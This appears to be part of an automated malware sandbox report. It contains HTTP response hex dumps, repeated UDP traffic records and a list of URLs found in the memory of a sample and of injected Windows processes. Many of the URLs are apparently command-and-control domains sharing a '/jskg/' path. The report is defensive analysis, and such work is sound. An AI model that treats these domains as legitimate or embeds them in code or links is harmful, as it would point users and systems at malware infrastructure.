20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:32:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:33:02 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w0Q2pTZmb8uR3ituotWcihVxyPQrSYnZIY93E3ajzRG67Kyly0iJn1NeYllgOaoyveTmmmo6vEHy0saGUSqpvK3tGGiMXqOvgolY4gdNrN5eL75KIF7l9k0xJAxsZzo1R1lJ5twk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=10.999918Server: cloudflareCF-RAY: 82958633cd4657c4-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofol
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 21 Nov 2023 02:33:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 21 Nov 2023 02:33:34 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E4DAWwtzAvJlPfepUXf0REHpRpg1KZxNlQmTEEg912%2B85hBib4Ig2ueyhZIBo3IBp0csP1An1oKj3iUwMIIIyL4ssmB931pkQ0tCLGYp4vFTBSg1TJIfhKEbnPR4ir3dLegP8gN3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=15.000105Server: cloudflareCF-RAY: 829586f64f218287-IADalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nof
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1236date: Tue, 21 Nov 2023 02:33:29 GMTserver: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000000.2001871398.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4448974063.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000002.4456836117.0000000011332000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000004.00000002.4450315499.00000000054F2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://lacroixundkress.de/jskg/?yV3lvHf=rveZUXr0eiAxnxziI1jk8UfOJjaXPdODc7FyD8YkXp0tAnYlEmHCL6gZaE21
Source: explorer.exe, 00000003.00000002.4453052192.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4453052192.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000002.4453052192.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2005157411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000002.4452618925.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4452142235.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2004670806.0000000008890000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: 1.exe, 00000000.00000002.2021348011.0000000002E71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bootyfashions.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bootyfashions.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bootyfashions.com/jskg/www.topazkibblez.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.bootyfashions.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.coryfireshop.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.coryfireshop.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.coryfireshop.com/jskg/www.lacroixundkress.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.coryfireshop.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dog2meeting.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dog2meeting.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dog2meeting.com/jskg/www.erotictoybox.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.dog2meeting.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.erotictoybox.com
Source: explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.erotictoybox.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.erotictoybox.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kvrkl.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kvrkl.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kvrkl.com/jskg/www.switchtoambitwithmirtha.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.kvrkl.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lacroixundkress.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lacroixundkress.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lacroixundkress.com/jskg/www.saraadamchak.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lacroixundkress.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lactationdrink.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lactationdrink.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lactationdrink.com/jskg/www.wisdomtoothguru.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lactationdrink.comReferer:
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lbarco.com
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lbarco.com/jskg/
Source: explorer.exe, 00000003.00000002.4456334831.000000000C9CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3094537043.000000000C9CC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.lbarco.com/jskg/www.bootyfashions.com
